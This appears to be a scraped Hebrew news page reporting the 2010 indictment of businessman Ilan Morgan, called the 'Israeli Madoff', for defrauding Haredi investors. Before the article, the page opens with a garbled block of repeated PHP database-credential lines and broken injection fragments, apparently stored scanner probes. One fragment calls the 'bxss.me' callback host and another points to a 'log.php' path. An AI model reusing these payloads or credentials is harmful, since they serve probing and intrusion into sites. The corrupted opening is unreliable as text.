$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> הוגש כתב אישום נגד איש העסקים אילן מורגן המכונה "מיידוף הישראלי"
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

הוגש כתב אישום נגד אילן מורגן שכונה "מיידוף הישראלי"

תאריך: 26/08/2010 17:38   מחבר: מערכת האתר

מורגן אילן הוא "מיידוף הישראלי"

לפני כשנתיים עלה לישראל מארה"ב איש העסקים אילן מורגן, בעליה של חברת ההשקעות הבינלאומיות "מורגן לומברד". למה הוא עלה ? ציונות לשמה? לא בטוח. הוא בא לעשות קופה על חשבון אזרחים טובים שבטחו בו, בכישוריו וביכולתו להשיא רווחים להשקעתם שנוהלה על ידו.

הרשות לניירות ערך חשדה בעולה החשד שבא לקבל ממנה רישיון לניהול תיקים. חשדה של מחלקת החקירות ברשות התעורר כאשר נודעו שיטות פעולותיו של מורגן. תוך כדי חקירה התברר, כי מורגן הקים לעצמו תשתית משומנת לגיוס כספים במרמה. לצורך הקמת התשתית חדר למגזר החרדי, הפיץ פרסומים בבתי הכנסת באמצעותם הציע לכל דיכפין להשקיע בחברה שלו את כספם, תוך הצגת מצגי שווא על יכולת החברה שלו והבטחה לתשואה חלומית של 3% לחודש.

להפעלת תוכניות גיוס הכספים במרמה, גייס מתווכים שאינם בעלי רישיון לניהול תיקים. אותם מתווכים הונחו על ידו להציג אותו כעשיר מופלג שעסקיו חובקי עולם וכל כסף שמושקע אצלו מוגן בביטחונות יציבים ואמינים המבטיחים בכל מקרה את החזר ההשקעה. עם התקדמות החקירה וחשיפת טכניקות הגניבה והמעילה כונה מורגן "מיידוף הישראלי".

כתב אישום

החקירה הושלמה. הראיות הבשילו לכתב אישום שהוגש היום 26.08.10 על ידי פרקליטות מיסוי וכלכלה. לפי המתואר בכתב האישום במהלך השנים 2007-2009 גייס מורגן כספים מאנשים במגזר החרדי למטרת הלוואה, תוך שהוא מבטיח להם בכזב כי ישקיע עבורם את הכסף ללא סיכון, וייתן להם החזר כספי רבעוני בשיעור ריבית חודשית עליה סוכם, ריבית שהיתה גבוהה מן המקובל בשוק. כל זאת, במטרה לגנוב את כספי הלווים.

לפי העולה מכתב האישום: " מורגן הציג עצמו כבעלים ומנהל של חברת מורגן השקעות שהקים, תוך ציון העובדה שהחברה בעלת רישיון ומפוקחת על-ידי הרשות. הוא הסתיר את העובדה שהגיע ארצה מארצות-הברית חסר נכסים ושהוא חייב כספים בשוק האפור, ותחת זאת יצר מצג כוזב לפיו הינו אדם אמיד ובעל נכסים בארצות-הברית. כן הבטיח הנאשם כי מן הרווחים שיפיק במסגרת תוכנית ההלוואות יתרום כספים לכוללים חרדיים".

עוד מתברר מכתב האישום כי מורגן הציג תמונות שלו עם רב חרדי מקובל כדי להוסיף קורטוב של אמינות לתוכניותיו להוציא מהם כספים במרמה. מורגן הגדיל לעשות עת הציג בפני משקיעים פוטנציאליים אישור מרבנים לפעילותו אליהם צירף הבטחה למתן תרומות ומעשרות לכוללים חרדים.

אנו נעקוב אחר הדיונים והחלטות בית המשפט בעניינו ונעדכן בהתאם.